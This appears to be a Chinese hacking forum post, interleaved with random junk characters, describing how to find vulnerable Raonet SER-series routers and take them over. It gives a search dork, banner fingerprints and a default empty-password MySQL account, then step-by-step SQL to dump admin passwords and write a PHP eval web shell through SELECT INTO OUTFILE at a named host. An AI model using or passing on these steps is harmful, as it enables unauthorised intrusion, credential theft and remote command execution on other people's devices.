寻找存在漏洞的路由器方法: N3 X8 z6 v2 @
0 R+ J; M' C0 M# S& d" F$ L- [7 H9 |3 O1:google搜索'Raonet Subscriber Ethernet Router'6 |8 O- P$ ^) s1 D
+ m& @* G0 n; K* R. t
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# O" e5 S) n; P6 D% r" w | O. W5 T; B6 K
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。+ I% E) b- j* r X9 @5 {9 }
9 i i- I& W) ]4 |//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......) T, v. g% d. H ^
9 M. M; o9 D: w8 H
. L2 |8 ~$ }5 A
4 L4 b, l& b! i! Y6 z( L0 v) Y; L" ^% W入侵步骤:3 l2 f+ Z9 C% Z. Y+ j4 c
4 ?0 ~1 j$ C4 h l7 ^; }4 A
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php/ F ~" o; a9 H% K. Z; t
4 F( T3 Q" o6 N5 F4 O. w4 _
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc; _' ~# ^2 h8 e; g7 A( v5 P
3:得到密码后连接,查看GUI管理密码:/ z4 ]: n8 R8 P" a2 x% _
use ser_500& [% s, V; d1 Z& \# B
select id,passwd from user;7 Y0 c1 E- s& |5 D
4:通过数据库写入webshell,执行命令:; {9 ^5 i' D4 ~# l+ w% z
use mysql;
! W9 }, L$ t! `1 Q% Jcreate table ok(cmd TEXT);
, E: U( ?9 I3 A4 i$ H: B; _+ Xinsert into ok values("<?php @eval($_POST[cmd])?>");
: ?0 g2 F* | I# x5 \select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";% e9 A/ }+ H5 a: M
drop table ok;8 C) X! }3 E1 c. R4 a! H, s
! T5 X% Z' w) u! S5:连接后门shell.php 7 } X( ~8 V( X
6 g7 x. B4 w3 n7 z6. 搞定!
1 u2 a7 Y9 }2 c2 C" Q! w! m7 P' o; X6 A, i! h
|